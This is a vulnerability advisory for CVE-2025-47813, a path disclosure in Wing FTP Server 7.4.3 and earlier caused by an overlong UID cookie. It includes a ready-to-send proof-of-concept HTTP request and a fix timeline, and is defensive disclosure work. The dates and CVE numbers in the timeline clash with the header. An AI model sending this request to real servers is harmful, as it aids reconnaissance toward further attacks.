Get in touch

Wing FTP Server Local Path Disclosure Through Overlong UID Session Cookie

Jun 30, 2025 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Wing FTP Server
  • Vendor URL: https://www.wftpserver.com
  • CWE: Generation of Error Message Containing Sensitive Information [CWE-209]
  • Date found: 2025-05-01
  • Date published: 2025-06-30
  • CVSSv4 Score: 5.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH)
  • CVE: CVE-2025-47813

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

WingFTP Server <= 7.4.3

INTRODUCTION

Wing FTP Server is a free, easy-to-use, and secure FTP server software for Windows, Linux, and Mac OS. It supports multiple file transfer protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP, giving your clients flexibility in how they connect to the server. And it provides admins with a web-based interface to administrate the server from anywhere. You can also monitor server performance and online sessions and even receive email notifications about various events taking place on the server.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The endpoint at “/loginok.html” does not properly validate the value of the “UID” session cookie. If an value is supplied on this way that is longer than the maximum path size of the underlying operating system, an error message is triggered which discloses the full local server path.

Successful exploits can allow an an authenticated attacker to get the local server path of the application, which can help in exploiting vulnerabilities like CVE-2025-47812.

PROOF OF CONCEPT

A payload to exploit this vulnerability looks like the following:

POST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: UID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection: keep-alive
Content-Length: 32

username=rcesec&password=correct

SOLUTION

Update to version 7.4.4

REPORT TIMELINE

  • 2025-05-10: Discovery of the vulnerability
  • 2025-05-10: MITRE assigns CVE-2025-47812
  • 2025-05-12: Contacted the vendor via their support@
  • 2025-05-12: Vendor confirms the issue as a critical bug
  • 2025-05-14: Vendor releases version 7.4.4 which fixes the vulnerability
  • 2025-06-30: Full Disclosure

REFERENCES